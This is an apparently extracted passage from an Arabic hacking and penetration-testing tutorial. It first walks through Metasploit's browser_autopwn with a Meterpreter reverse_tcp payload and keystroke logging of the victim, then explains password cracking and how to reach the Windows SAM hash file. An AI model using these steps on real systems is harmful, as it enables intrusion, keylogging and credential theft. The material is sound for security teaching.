payloadsﻣن اﻟﻧوع .Windows Reverse TCPﻋﻧدﻣﺎ ﯾﻔﺗﺢ اﻟﮭدف ﻣﻠف ،PDFﻓﺎن Meterpreterﺳوف ﯾﻌﻣل وﯾﻘوم ﺑﻔﺗﺢ ﻗﺎﻧﺔ
اﺗﺻﺎل ﺑﯾﻧك وﺑﯾن اﻟﮭدف.
IMPLEMENTING BROWSER_AUTOPWN
BROWSER_AUTOPWNھﻲ وﺣدة اﻟﻣﺳﺎﻋدة ) (auxiliary moduleاﻟﺗﻲ ﺗﻘدﻣﮭﺎ Metasploitاﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﮭﺟوم ﻋﻠﻰ
ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﺑطرﯾﻘﮫ اﻟﯾﮫ ﺑﺑﺳﺎطﺔ ﻋﻧد ﻓﺗﺢ ﺻﻔﺣﺔ اﻟوﯾب BROWSER_AUTOPWN .ﯾﻧﻔذ ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع ﻋﻠﻰ اﻟﻌﻣﯾل ﻗﺑل أن
ﯾﮭﺎﺟم؛ وھذا ﯾﻌﻧﻲ أﻧﮫ ﻟن ﯾﺣﺎول اﺧﺗراق ﻣوزﯾﻼ ﻓﺎﯾرﻓوﻛس ﺿد ﻣﺗﺻﻔﺢ إﻧﺗرﻧت إﻛﺳﺑﻠورر .7اﺳﺗﻧﺎدا إﻟﻰ ﺗﺻﻣﯾم اﻟﻣﺗﺻﻔﺢ ،ﻓﺈﻧﮫ ﯾﻘرر ﻣﺎ ھو
أﻓﺿل exploitﻟﻠﻧﺷر.
-1ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل
-2ﻧﻘوم ﺑﺗﺷﻐﯾل metasploitﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر msfconsoleﻓﻲ اﻟﺗرﻣﻧﺎل.
-3ﻧﻘو ﺑﺎﻟﺑﺣث ﻋن ﺛﻐرات ﻋن طرﯾﻖ اﺻدار اﻻﻣر .search autopwn
-4اﺳﺗﺧدام اﻟوﺣدة :BROWSER_AUTOPWN
use auxiliary/server/browser_autopwn
-5ﻧﻘوم ﺑﺗﺛﺑﯾت PAYLOADﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﻧﺧﺗﺎر .Windows Reverse TCP
set payload windows/meterpreter/reverse_tcp
-6ﺛم ﻧﻘوم ﺑﺎﺳﺗﺧدام اﻻﻣر show optionsﻟﻌرض اﻟﻣﺗطﻠﺑﺎت ﻟﺗﺷﻐﯾل exploitھذا.
-7ﻧﻼﺣظ ﻣن اﻟﻣﺗطﻠﺑﺎت اﻧﮫ ﯾﺣﺗﺎج وﺿﻊ ﻛل ﻣن LHOSTو. URIPATH
-8ﺣﯾث ﯾﻌﺑر LHOSTﻋن ﻋﻧوان IPﻟﻠﻣﺿﯾف اﻟﮭدف اﻟذي ﺳوف ﯾﺗم إﺟراء اﻻﺗﺻﺎل اﻟﻌﻛﺳﻲ.
set LHOST 192.168.10.109
"set URIPATH "filetypes
-9ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل EXPLIOTﻋن طرﯾﻖ اﺻدار اﻻﻣر .exploit
Metasploit -10ﯾﺑدأ exploitﻋﻠﻰ اﻟﻌﻧوان IPاﻹﻟﻛﺗروﻧﻲ http://[Provided IP Address]:8080
-11ﻋﻧدﻣﺎ ﯾزور اﻟزاﺋر ﻋﻧوان ،ﻓﺎن اﻟوﺣدة browser_autopwnﺗﺣﺎول اﻻﺗﺻﺎل ﺑﺟﮭﺎز اﻟﻣﺳﺗﺧدم ﻹﻧﺷﺎء sessionﺑﻌﯾدة .ﻓﻲ ﺣﺎل
ﻧﺟﺎﺣﮭﺎ ،ﻓﺎن Meterpreterﺗواﻓﻖ ﻋﻠﻰ ھذا اﻻﺗﺻﺎل .ﻟﺗﻧﺷﯾط ،sessionاﺳﺗﺧدم اﻷﻣر اﻟﺗﺎﻟﻲ:
sessions –I 1
-12ﻟرؤﯾﺔ ﻣﻌظم أواﻣر Meterpreterﯾﻣﻛن اﺻدار اﻻﻣر .help
-13ھﻧﺎك ﻗﺎﺋﻣﺔ ﻣن اﻷواﻣر اﻟﻣﺗوﻓرة .ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﺳوف ﻧﺑدأ ﻓﺣص اﻟﻣﻔﺎﺗﯾﺢ:
keyscan_start
-14ﻟﻠﺣﺻول ﻋﻠﻰ keystrokesاﻟﺗﻲ ﺗم اﺗﺧﺎذھﺎ ﻣن وﺟﮭﺔ ﻧظرن اﻟﺿﺣﯾﺔ ،ﻓﻧﺣن ﺑﺻدد إﺻدار اﻷﻣر .keyscan_dump
ﻓﻲ ھذه اﻟﺟزء ،اﺳﺗﺧدﻣﻧﺎ MSFCONSOLEﻹطﻼق .exploit browser_autopwnﺑدأﻧﺎ ﻣن ﺧﻼل إطﻼق وﺣدة اﻟﺗﺣﻛم واﻟﺑﺣث
ﻋن ﺟﻣﯾﻊ وﺣدات autopwnاﻟﻣﻌروﻓﺔ .ﺑﻌد اﺧﺗﯾﺎر وﺣدة ،autopwnوﺿﻌﻧﺎ payloadﻣن اﻟﻧوع windows_reverse_tcp؛ واﻟذي
ﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ اﺗﺻﺎل ﻣرة أﺧرى ﻟﻧﺎ إذا ﻛﺎن اﻻﺧﺗراق ﻧﺎﺟﺢ .ﺑﻣﺟرد زﯾﺎرة اﻟﺿﺣﯾﺔ اﻟﻣوﻗﻊ ،ﻓﻧﺣن ﺳوف ﻧﺣﺻل ﻋﻠﻰ sessionﻠﻠ
Meterpreterﻧﺷطﺔ.
ھﻧﺎ ﻧﻛون اﻧﺗﮭﯾﻧﺎ ﻣن اﻟﺟزء اﻟﺧﺎص ﺑﺎﻠ metasploitوﻟﻛﻧﮫ ﻟﯾس ﻛل ﺷﻲء ﺣﯾث ﺳوف ﻧﻔرد ﻟﮭذا اﻟﺟزء ﻛﺗﺎب ﺧﺎص ﺑﮫ ﻻﺣﻘﺎ وذﻟك
ﻷھﻣﯾﺗﮫ.
ﻻ ﯾﻣﻛن أن ﯾﺗﺣﻘﻖ اﻻﺧﺗراق ﻣرة واﺣده .ﯾﺗم إﻧﺟﺎز ذﻟك ﻣن ﺧﻼل اﻟﺧطوات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺷﻣل ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر]، [cracking password
واﻻﻣﺗﯾﺎزات اﻟﻣﺗﺻﺎﻋد] ، [escalating privilegesواﻟﺗطﺑﯾﻘﺎت اﻟﻣﻧﻔذة] ، [executing applicationsأﺧﻔﺎء اﻟﻣﻠﻔﺎت]، [hiding files
وﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ] ،[covering tracksوأﺧﯾرا اﺧﺗﺑﺎر اﻻﺧﺗراق .اﻵن ﺣﺎن اﻟوﻗت ﻟﻣﻧﺎﻗﺷﺔ ھذه اﻟﺧطوات واﺣدة ﺗﻠو اﻷﺧرى ﺑدﻗﺔ ،ﻟﺗﺣدﯾد
ﻛﯾﻔﯾﺔ اﺧﺗراق اﻟﻣﮭﺎﺟم اﻟﻧظﺎم .ﻓﻲ ﻣﺣﺎوﻟﺔ اﺧﺗراق اﻟﻧظﺎم ،ﯾﺣﺎول اﻟﻣﮭﺎﺟم اوﻻ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر.
أﻧﮫ ﻣن اﻟﺻﻌب أن ﻧﺗﺻور ﻣﻧﺎﻗﺷﺔ ﻣوﺿوع ﻣﺛل أﺳﺎﺳﯾﺎت اﻟﻘرﺻﻧﺔ دون ﻣﻧﺎﻗﺷﺔ ﻛﻠﻣﺎت اﻟﺳر وﻛﺳر ﻛﻠﻣﺔ اﻟﺳر .ﺑﻐض اﻟﻧظر ﻋﻣﺎ ﻧﻔﻌﻠﮫ أو
ﻣدى ﺗﻘدﻣﻧﺎ ،ﯾﺑدو أن ﻛﻠﻣﺎت اﻟﺳر ﺗظل أﻛﺛر اﻟطرق ﺷﻌﺑﯾﺔ ﻟﺣﻣﺎﯾﺔ اﻟﺑﯾﺎﻧﺎت واﻟﺳﻣﺎح ﺑﺎﻟوﺻول إﻟﻰ اﻟﻧظم .ﻣﻊ ھذا ﻓﻲ اﻻﻋﺗﺑﺎر ،دﻋوﻧﺎ ﻧﻠﻘﻲ
اﻟﺗﻔﺎف ﻗﺻﯾر ﻟﺗﻐطﯾﺔ أﺳﺎﺳﯾﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر.
ھﻧﺎك ﻋدة أﺳﺑﺎب ﻟﻣﺎذا ﻣﺧﺗﺑر اﻻﺧﺗراق ﺳوف ﺗﻛون ﻣﮭﺗﻣﺔ ھﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر .أوﻻ وﻗﺑل ﻛل ﺷﻲء ،ھذا ھو أﺳﻠوب ﻋظﯾم ﻟرﻓﻊ وﺗﺻﻌﯾد
اﻻﻣﺗﯾﺎزات .اﻟﻧظر ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ :ﻧﻔﺗرض أن ﻛﻧت ﻗﺎدرا ﻋﻠﻰ ﺧرق اﻟﻧظﺎم اﻟﮭدف وﻟﻛن ﺑﻌد ﺗﺳﺟﯾل اﻟدﺧول ،ﺗﻛﺗﺷف أن ﻟﯾس ﻟدﯾك أي
ﺣﻘوق ﻋﻠﻰ ھذا اﻟﻧظﺎم .ﺑﻐض اﻟﻧظر ﻋﻣﺎ ﺗﻔﻌﻠﮫ ،وﻛﻧت ﻏﯾر ﻗﺎدر ﻋﻠﻰ اﻟﻘراءة واﻟﻛﺗﺎﺑﺔ ﻓﻲ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات اﻟﮭدف وأﺳوأ ﻣن ذﻟك ،ﻛﻧت
ﻏﯾر ﻗﺎدر ﻋﻠﻰ ﺗﺛﺑﯾت أي ﺑرﻧﺎﻣﺞ ﺟدﯾد .ھذا ھو اﻟﺣﺎل ﻏﺎﻟﺑﺎ ﻋﻧد اﻟﺣﺻول ﻋﻠﻰ ﺣﺳﺎب ﻟدﯾﮭﺎ اﻣﺗﯾﺎزات ﻗﻠﯾﻠﮫ ﯾﻧﺗﻣون إﻟﻰ ﻣﺟﻣوﻋﺎت ] [userاو
].[guest
إذا ﻛﺎن اﻟﺣﺳﺎب اﻟذي ﻟدﯾﮫ اﻟوﺻول إﻟﻰ ﻋدد ﻗﻠﯾل أو ﻟﯾس ﻟدﯾﮫ أي ﺣﻘوق ،ﻓﻠن ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﺗﻧﻔﯾذ اﻟﻌدﯾد ﻣن اﻟﺧطوات اﻟﻣطﻠوﺑﺔ ﻟﻣزﯾد ﻣن
ﺗﻧﺎزﻻت اﻟﻧظﺎم .إذا ﻓﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز
اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن.
ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول اﻟﻰ
ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ.
اﻟﻌدﯾد ﻣن ﻣﺣﺎوﻻت اﻟﻘرﺻﻧﺔ ﺗﺑدأ ﻣﻊ ﻣﺣﺎوﻻت ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر .Password Crackingﻛﻠﻣﺎت اﻟﺳر ھﻲ ﻗطﻌﺔ رﺋﯾﺳﯾﺔ ﻟﻠﻣﻌﻠوﻣﺎت
اﻟﺿرورﯾﺔ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺈن ﻣﻌظم اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ﺗﻘﻧﯾﺎت Password Crackingﻟﻠوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ
اﻟﻧظﺎم اﻟﺿﻌﯾف .ﻗد ﺗﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﯾدوﯾﺎ أو ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل dictionaryأو أﺳﻠوب اﻟﻘوة اﻟﻐﺎﺷﻣﺔ.brute-force method
ﺑراﻣﺞ اﻟﻛﻣﺑﯾوﺗر اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ھﻲ وظﺎﺋف ﻟﻠﺗﺣﻘﻖ ﻣن ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺣﺗﻣﻠﺔ ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة ﻣﮭﺎ .ﻓﻲ ﻛﺛﯾر
ﻣن اﻷﺣﯾﺎن ﻓﺎن ﻏﺎﻟﺑﯾﮫ اﻟﻣﺳﺗﺧدﻣﯾن ،ﻋﻧد إﻧﺷﺎء ﻛﻠﻣﺎت ﻣرور ،ﯾﺳﺗﺧدﻣوا ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﻟدﯾﮭم اﺳﺗﻌداد ﻋﻠﻰ ﺗذﻛرھﺎ وﺗﻛون ﺳﮭﻠﺔ اﻟﺗوﻗﻊ
ﻣﺛل اﺳﺗﺧدام اﺳم ﺣﯾوان أﻟﯾف أو اﺧﺗﯾﺎر واﺣد ﺑﺳﯾط ﺣﺗﻰ ﯾﺗﻣﻛﻧوا ﻣن ﺗذﻛرھﺎ .ﻣﻌظم ﺗﻘﻧﯾﺎت ﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر ﻧﺎﺟﺣﺔ ﺑﺳﺑب ﻛﻠﻣﺎت ﻣرور
اﻟﺿﻌﯾﻔﺔ أو ﺗﺧﻣﯾﻧﮭﺎ ﺑﺳﮭوﻟﺔ.
ﺗﻌﻘﯾد ﻛﻠﻣﺔ اﻟﻣرور ) (Password Complexityﯾﻠﻌب دورا رﺋﯾﺳﯾﺎ ﻓﻲ ﺗﺣﺳﯾن اﻷﻣن ﺿد اﻟﮭﺟﻣﺎت .ذﻟك ھو اﻟﻌﻧﺻر اﻟﮭﺎم اﻟذي ﯾﺟب
ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن ﺿﻣﺎﻧﮫ أﺛﻧﺎء إﻧﺷﺎء ﻛﻠﻣﺔ ﻣرور .ﯾﺟب أﻻ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور ﺑﺳﯾطﺔ ﺣﯾث ان ﻛﻠﻣﺎت اﻟﻣرور اﻟﺑﺳﯾط ﻋرﺿﺔ ﺑﺳﮭوﻟﮫ
ﻟﻠﮭﺟﻣﺎت .ﯾﺟب أن ﺗﻛون ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ اﺧﺗرﺗﮭﺎ داﺋﻣﺎ ﻣﻌﻘدة وطوﯾﻠﺔ ،وﯾﺻﻌب ﺗذﻛرھﺎ .ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗﻘوم ﺑﺈﻋدادھﺎ ﻟﺣﺳﺎﺑك ﯾﺟب
أن ﺗﺳﺗوﻓﻲ ﻣﺗطﻠﺑﺎت إﻋدادات ﻧﮭﺞ اﻟﺗﻌﻘﯾد .ﯾﺟب أن ﺗﻛون اﻷﺣرف ﻛﻠﻣﺔ ﻣرور ﻣزﯾﺞ ﻣن اﻷﺣرف اﻷﺑﺟدﯾﺔ واﻟرﻗﻣﯾﺔ .ﺗﺗﻛون ﻣن أﺣرف
أﺑﺟدﯾﺔ رﻗﻣﯾﺔ ﻣن اﻟﺣروف واﻷرﻗﺎم وﻋﻼﻣﺎت اﻟﺗرﻗﯾم ،واﻟرﯾﺎﺿﯾﺔ وﻏﯾرھﺎ ﻣن اﻟرﻣوز اﻟﺗﻘﻠﯾدﯾﺔ .ﻓﺎﻧظر اﻟﻰ ﺑﻌض اﻣﺛﻠﺔ ﻛﻠﻣﺎت اﻟﻣرو ﻛﺎﻻﺗﻰ:
- Passwords that contain letters, special characters, and numbers: ap1@52
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف واﺷﻛﺎل ﺧﺎﺻﮫ وأرﻗﺎم.
- Passwords that contain only numbers: 23698217
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ارﻗﺎم ﻓﻘط.
)- Passwords that contain only special characters :&*#@!(%
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي اﺷﻛﺎل ﺧﺎﺻﮫ ﻓﻘط.
- Passwords that contain letters and numbers: meet123
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف وأرﻗﺎم.
- Passwords that contain only letters: PUTHMYDE
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف ﻓﻘط.
- Passwords that contain only letters and special characters: bob@&ba
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف واﺷﻛﺎل ﺧﺎﺻﮫ.
- Passwords that contain only special characters and numbers: 123@$4
ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﺷﻛﺎل ﺧﺎﺻﮫ وأرﻗﺎم.
ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻟﮭدف ﻣن ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ھو اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﻌطﯾﻧﺎ اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ اﻟﻰ اﻟﻧظﺎم اﻟﮭدف ﻣﻊ
ﺻﻼﺣﯾﺎت اﻋﻠﻰ ،وﻟﻛن ﻗﺑل ذﻟك ﺳوف ﻧﺗطرق اﻟﻰ طرﯾﻖ ﻣﺻﺎدﻗﮫ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل وطرق ﺗﺧزﯾﻧﮭﺎ ﻟﻛﻠﻣﺎت اﻟﻣرور.
Microsoft Authentication
ﻣﻌظم اﻟﻧظم اﻟﺗﻲ ﺗﺳﺗﺧدم آﻟﯾﺔ ﻣﺻﺎدﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺗﺣﺗﺎج إﻟﻰ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ھذه )أو اﻟﮭﺎش اﻟﺧﺎﺻﺔ ﺑﮭم( ﻣﺣﻠﯾﺎ ﻋﻠﻰ اﻟﺟﮭﺎز .ھل
ھذا ﺻﺣﯾﺢ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل )وﯾﻧدوز ،ﻟﯾﻧﻛس ،وﺳﯾﺳﻛو ،(IOSوأﺟﮭزة اﻟﺷﺑﻛﺔ )اﻟراوﺗر واﻟﺳوﯾﺗﺷﺎت(.
SAM Database
ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺗﺧزن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة ) (Encrypted Password Hashﻓﻲ ﻣﻛﺎن واﺣد .ﻓﻲ اﻷﻧظﻣﺔ اﻟﻣﺳﺗﻧدة إﻟﻰ
،Windowsﯾﺗم ﺗﺧزﯾن اﻟﮭﺎش ﻓﻲ ﻣﻠف ﺧﺎص ﯾﺳﻣﻰ ).(SAM
ﻗﺎﻋدة ﺑﯾﺎﻧﺎت SAMھﻲ اﺧﺗﺻﺎر ﻠ .Security Accounts Manager databaseﺗﺳﺗﺧدم ﻣن ﻗﺑل وﯾﻧدوز ﻹدارة ﺣﺳﺎﺑﺎت
اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﺷﻛل اﻟﮭﺎش )) (hashed formatذات اﺗﺟﺎه واﺣد( .ﺣﯾث ﻻ ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر أﺑدا ﻓﻲ ﺷﻛﻠﮭﺎ
اﻟﻌﺎدي .ﻟﻛن ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﺷﻛل اﻟﮭﺎش ﻟﯾﺗم ﺣﻣﺎﯾﺗﮭﺎ ﻣن اﻟﮭﺟﻣﺎت .ﻗﺎﻋدة ﺑﯾﺎﻧﺎت SAMﯾﺗم ﺗﻧﻔﯾذھﺎ ﻛﻣﻠف رﺟﯾﺳﺗري). (registry file
اﻷﻧظﻣﺔ اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ Windows NTﺑﻣﺎ ﻓﻲ ذﻟك وﯾﻧدوز ،2000واﻻﺻدارات اﻟﺗﻲ ﺗﻠﯾﮭم ،ﯾﺗم وﺿﻊ اﻟﻣﻠف SAMﻓﻲ اﻟﻣﺳﺎر
)\ .(C:\Windows\System32\Configاﻵن ﺑﻌد أن ﺗﻌرﻓﻧﺎ ﻋﻠﻰ ﻣوﻗﻊ اﻟﻣﻠف ، SAMﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻻﺳﺗﺧراج ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﻣن
اﻟﻣﻠف .وﻷن اﻟﻣﻠف SAMﯾﺣﻣل ﺑﻌض اﻟﻣﻌﻠوﻣﺎت اﻟﮭﺎﻣﺔ ﺟدا ،ﻓﺄن ﻣﺎﯾﻛروﺳوﻓت ﻗد أﺿﺎﻓت ﺑﺣﻛﻣﺔ ﺑﻌض اﻟﻣﯾزات اﻷﻣﻧﯾﺔ اﻹﺿﺎﻓﯾﺔ
ﻟﻠﻣﺳﺎﻋدة ﻓﻲ ﺣﻣﺎﯾﺔ ھذا اﻟﻣﻠف.
اﻟﺣﻣﺎﯾﺔ اﻷوﻟﻰ ھﻲ أن اﻟﻣﻠف SAMﯾﺗم ﻏﻠﻘﮫ ﻓﻲ اﻟﺣﻘﯾﻘﺔ ﻋﻧد ﺑداﯾﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل .ھذا ﯾﻌﻧﻲ أﻧﮫ ﻓﻲ ﺣﯾن ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾس
ﻟدﯾﻧﺎ اﻟﻘدرة ﻋﻠﻰ ﻓﺗﺢ أو ﻧﺳﺦ اﻟﻣﻠف .SAMﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ھذا اﻟﻘﻔل ،ﯾﺗم ﺗﺷﻔﯾر اﻟﻣﻠف SAMﻛﺎﻣل وﻏﯾر ﻗﺎﺑل ﻟﻠﻌرض.
ﻟﺣﺳن اﻟﺣظ ،ھﻧﺎك طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﻘﯾود ﻋﻠﻰ ﺣد ﺳواء .ﻓﺎذا ﻛﺎن ﻟدﯾﻧﺎ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﻧظﺎم ،ﻓﺄن أﺑﺳط طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﺣﻣﺎﯾﺔ
ھو اﺳﺗﺧدام ﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻣﺛل ﻛﺎﻟﻲ) . (Live OSﺑواﺳطﺔ اﺳﺗﺧدام ﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ،ﻓﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺟﺎوز
ﺗﺄﻣﯾن اﻟوﯾﻧدوز ﻟﻠﻣﻠف .SAMھذا ﻣﻣﻛن ﻷن ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻻ ﯾﺑدأ ،ﻓﺎذا اﻟﻘﻔل ﻟن ﯾﻌﻣل أﺑدا ،وﻧﻛون أﺣرار ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠف
.SAMﻟﻸﺳف ،ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ،SAMﻟذﻟك ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﺳﺗﺧدام أداة ﻟﻠوﺻول إﻟﻰ اﻟﮭﺎش .ﻟﺣﺳن اﻟﺣظ ،ﯾوﺟد اﻟﻌدﯾد ﻣن
اﻷدوات ﻟﻠوﺻول اﻟﻰ اﻟﮭﺎش وﺗرﺟﻣﻧﮫ اﻟﻰ ﻧص ﻋﺎدى .أﯾﺿﺎ ﯾﻣﻛن ﻧﺳﺦ ﻣﺣﺗوﯾﺎت اﻟﻣﻠف SAMﻋﻠﻰ اﻟﻘرص ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ.
ﻋرﺿت ﺷرﻛﺔ ﻣﺎﯾﻛروﺳوﻓت وظﯾﻔﺔ SYSKEYﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل Windows NT 4.0ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺣﺳﯾن أﻣن ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت SAM
ﺿد اﻟﺑرﻣﺟﯾﺎت اﻟﻣﺗواﺟد ﺣﺎﻟﯾﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور.
ﺗﻘوم اداة SYSKEYﻋﻠﻰ ﺗﺷﻔﯾر ﻣﻌﻠوﻣﺎت ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ ﻣرور ﻣدﯾر أﻣن اﻟﺣﺳﺎﺑﺎت ) (SAMاﻟﺗﻲ ﺗﺳﺗﺧدم داﻟﺔ اﻟﮭﺎش ﻓﻲ ﻧظﺎم
وﯾﻧدوز واﻟﺗﻲ ﺗﺳﺗﺧدم ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر 128ﺑت .ﻛﺎﻧت أداة SYSKEYﻣﯾزة اﺧﺗﯾﺎرﯾﺔ ﻓﻲ ﻧظﺎم وﯾﻧدوز إن ﺗﻲ .4.0وﻛﺎن ﻣن اﻟﻣﻔﺗرض ﻟﮭﺎ
ان ﺗﻘوم ﺑﺣﻣﺎﯾﺔ ﻣﻌﻠوﻣﺎت ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ ﻣرور ﻣدﯾر أﻣن اﻟﺣﺳﺎﺑﺎت ) (SAMﻟﻠﺣﻣﺎﯾﺔ ﻣن ھﺟﻣﺎت اﻻﺧﺗراق داﺧل اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ وﻟﺗﺑﻘﻰ
اﻟﻣﻌﻠوﻣﺎت آﻣﻧﺔ ﺣﺗﻰ ﻟو ﺗم ﻧﺳﺧﮭﺎ .وﻣﻊ ذﻟك ،ﻓﻲ دﯾﺳﻣﺑر ﻣن ﻋﺎم 1999م ﻋﺛر ﻓرﯾﻖ أﻣﻧﻲ ﻣن BindViewﻋﻠﻰ ﺛﻐرة أﻣﻧﯾﺔ ﻓﻲ اﻷداة
ﺗﺟﻌل ﻣن اﻟﻣﻣﻛن اﻻﺧﺗراق ﺣﺗﻰ داﺧل اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﺑﺎﺳﺗﺧدام ﻧوع ﻣﻌﯾن ﻣن أداة ﺗﺣﻠﯾل اﻟﺷﻔرات . cryptanalyticوھذا ﯾﺗﯾﺢ اﻻﺧﺗراق
ﻣن ﻧوع brute forceاﻟذي ﯾﺳﺗﮭدف أي ﺿﻌف ﻓﻲ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة.
ﻓﯾﻣﺎ ﺑﻌد ،ﺗﻌﺎوﻧت ﻣﺎﯾﻛروﺳوﻓت ﻣﻊ ﻓرﯾﻖ BindViewﻟﺗﺳوﯾﺔ ھذه اﻟﻣﺷﻛﻠﺔ اﻟﺗﻲ ﻋرﻓت ﻻﺣﻘﺎ ﺑﺎﺳم ﺧﻠل ﺳﯾﺳﻛﻲ ' 'Syskey Bugوأﻋﻠن
